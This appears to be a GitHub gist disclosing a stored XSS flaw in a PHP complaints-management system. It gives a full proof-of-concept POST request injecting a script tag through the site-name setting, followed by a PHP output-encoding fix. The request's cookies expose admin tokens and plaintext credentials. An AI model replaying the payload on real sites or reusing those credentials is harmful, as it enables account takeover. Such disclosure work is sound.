Save topsky979/e8b6651dd46922157920c8ed2305efd5 to your computer and use it in GitHub Desktop.

[Description]

Complaints Report Management System was discovered to contain a stored XSS vulnerability via the URI /admin/ajax.php?action=save_settings.


[Vulnerability Type]

Cross Site Scripting (XSS)


[Vendor of Product]

https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html


[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]
Request payload (note the name field, which carries the injected script):

POST /admin/ajax.php?action=save_settings HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 3024
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylGtcTy5dSGqTRZW6
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/index.php?page=site_settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; layers=5; BatchSelected=null; Path=/www/wwwroot/1111.com/admin; vcodesum=16; PHPSESSID=git91lpt9et0atu8q4dg73890i
Connection: keep-alive

------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="name"

Crime/Complaints Reporting Management System"><script>alert(11)</script>
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="email"

info@sample.comm
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="contact"

+6948 8542 623
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="about"

<p style="text-align: center; background: transparent; position: relative;"><span style="font-size: 30px; font-family: Tahoma, Geneva, sans-serif;"><strong>Sample Content</strong></span></p><p style="text-align: center; background: transparent; position: relative;">&nbsp;Lorem is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><img src="http://localhost/crms/admin/assets/uploads/1604029260_p1.jpg" style="width: 558px;" class="fr-fic fr-dib"></p><p style="text-align: center; background: transparent; position: relative;">&nbsp;Lorem is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. 
It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p><p style="text-align: center; background: transparent; position: relative;"><br></p><div class="fr-img-space-wrap" style="text-align: center;"><img src="http://localhost/crms/admin/assets/uploads/1604029320_police cars.jpg" style="width: 567px;" class="fr-fic fr-rounded fr-dib"><p class="fr-img-space-wrap2">&nbsp;</p></div><p><br></p><p><br></p><p data-f-id="pbf" style="text-align: center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family: sans-serif;">Powered by <a href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala Editor">Froala Editor</a></p>
------WebKitFormBoundarylGtcTy5dSGqTRZW6
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarylGtcTy5dSGqTRZW6--
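The value submitted in the PoC's name field above ends the HTML attribute it is later rendered into, which is why the script tag becomes live markup on the settings page. The following PHP is an added example, not code from the Complaints Report Management System or from this gist: it assumes the stored site name is echoed into an input attribute on the admin settings page (the function and variable names are illustrative) and contrasts that pattern with context-aware output encoding.

```php
<?php
// Added example (not the project's code). Contrasts unsafe interpolation of a
// stored site-settings value into an HTML attribute with output encoding via
// htmlspecialchars(). Function and variable names are illustrative.

// Constructed sample: the value submitted in the PoC's "name" field.
$storedName = 'Crime/Complaints Reporting Management System"><script>alert(11)</script>';

// Vulnerable pattern: the stored setting is echoed straight into an attribute.
// The "> in the value closes the attribute and the <input> tag, so the
// <script> element that follows is parsed as real markup by every admin
// browser that loads the page (stored XSS).
function renderNameUnsafe(string $name): string {
    return '<input type="text" name="name" value="' . $name . '">';
}

// Hardened pattern: encode at the output point for the HTML attribute context.
// ENT_QUOTES encodes both " and ' so the value cannot terminate the attribute;
// ENT_SUBSTITUTE avoids silently returning an empty string on invalid UTF-8.
function renderNameSafe(string $name): string {
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="name" value="' . $encoded . '">';
}

// Defence in depth at save time: a site name has no legitimate need for
// markup characters, so reject values containing them before storing.
// (Illustrative allow-list; adjust to the characters the site actually needs.)
function isAcceptableSiteName(string $name): bool {
    return mb_strlen($name) <= 100
        && preg_match('/^[\p{L}\p{N} \/\-&.,\'()]+$/u', $name) === 1;
}

// Simple regression check a reviewer can run over rendered output.
function containsLiveScriptTag(string $html): bool {
    return stripos($html, '<script') !== false;
}

$unsafe = renderNameUnsafe($storedName);
$safe   = renderNameSafe($storedName);

echo "Unsafe: $unsafe\n";
echo "Safe:   $safe\n";
echo 'Unsafe output contains live <script>: ' . var_export(containsLiveScriptTag($unsafe), true) . "\n";
echo 'Safe output contains live <script>:   ' . var_export(containsLiveScriptTag($safe), true) . "\n";
echo 'PoC name accepted at save time:       ' . var_export(isAcceptableSiteName($storedName), true) . "\n";
```

Output encoding at render time is the fix that actually closes the hole; the save-time check only narrows what reaches storage. Note that the same approach does not transfer to the about field in the request, which is rich HTML produced by the Froala editor: that value has to be run through an HTML sanitizer with an element and attribute allow-list, since htmlspecialchars() would turn the intended formatting into visible text.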
